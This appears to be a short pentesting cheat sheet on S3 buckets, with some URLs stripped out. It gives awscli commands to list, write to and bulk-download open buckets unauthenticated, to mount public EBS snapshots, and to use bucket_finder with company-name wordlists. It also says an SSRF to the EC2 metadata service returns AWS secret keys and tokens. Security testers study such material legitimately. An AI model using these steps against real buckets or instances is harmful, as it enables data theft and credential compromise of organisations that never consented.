Amazon Bucket S3 AWS


Amazon Bucket S3 AWS

Prerequisites, at least you need awscli

sudo apt install awscli

You can get your credential here /security_credential
but you need an aws account, free tier account :

aws configure

 aws configure --profile nameofprofile

then you can use *--profile nameofprofile* in the aws command

By default the name of Amazon Bucket are like[bucket_name]/
you can browse open buckets if you know their names[bucket_name]/

  Basic test - Listing the files

aws s3 ls s3://targetbucket --no-sign-request --region insert-region-here

aws s3 ls  s3:// --no-sign-request --region us-west-2

You can get the region with a dig and nslookup

$ dig

$ nslookup
Non-authoritative answer: name =

  Move a file into the bucket

aws s3 mv test.txt s3://
FAIL : "move failed: ./test.txt to s3:// A client error (AccessDenied) occurred when calling the PutObject operation: Access Denied."

aws s3 mv test.txt s3://hackerone.files
SUCCESS : "move: ./test.txt to s3://hackerone.files/test.txt"

  Download every things (in an open bucket)

aws s3 sync s3:// . --no-sign-request --region us-west-2

  Check bucket disk size (authenticated) use, --no-sign for un-authenticated 

aws s3 ls s3://<bucketname> --recursive  | grep -v -E "(Bucket: |Prefix: |LastWriteTime|^$|--)" | awk 'BEGIN {total=0}{total+=$3}END{print total/1024/1024" MB"}'

  AWS - Extract Backup

aws --profile flaws sts get-caller-identity
"Account": "XXXX26262029",

aws --profile flaws  ec2 describe-snapshots --owner-id XXXX26262029 --region us-west-2    
"SnapshotId": "snap-XXXX342abd1bdcb89",

Create a volume using snapshot
aws --profile swk ec2 create-volume --availability-zone us-west-2a --region us-west-2  --snapshot-id  snap-XXXX342abd1bdcb89

In Aws Console -> EC2 -> New Ubuntu
chmod 400 YOUR_KEY.pem
ssh -i YOUR_KEY.pem

Mount the volume
sudo file -s /dev/xvda1
sudo mount /dev/xvda1 /mnt

  Bucket informations
Amazon exposes an internal service every EC2 instance can query for instance metadata about the host.
 If you found an SSRF vulnerability that runs on EC2, 
try requesting : will return the AccessKeyID, SecretAccessKey, and Token

For example with a proxy :

  Bucket Finder
A cool tool that will search for readable buckets and list all the files in them. It can also be used to quickly find buckets that exist but deny access to listing files.

wget -O bucket_finder_1.1.tar.bz2
./bucket_finder.rb my_words
./bucket_finder.rb --region ie my_words

US Standard =
Ireland =
Northern California =
Singapore =
Tokyo =

./bucket_finder.rb --download --region ie my_words
./bucket_finder.rb --log-file bucket.out my_words

Use a custom wordlist for the bucket finder, can be created with

List of Fortune1000 company names with permutations on .com, -backup, -media. For example, walmart becomes walmart,, walmart-backup, walmart-media.
List of the top Alexa 100,000 sites with permutations on the TLD and www. For example, becomes,,, and walmart.

Public Reports on Hackerone


Post a Comment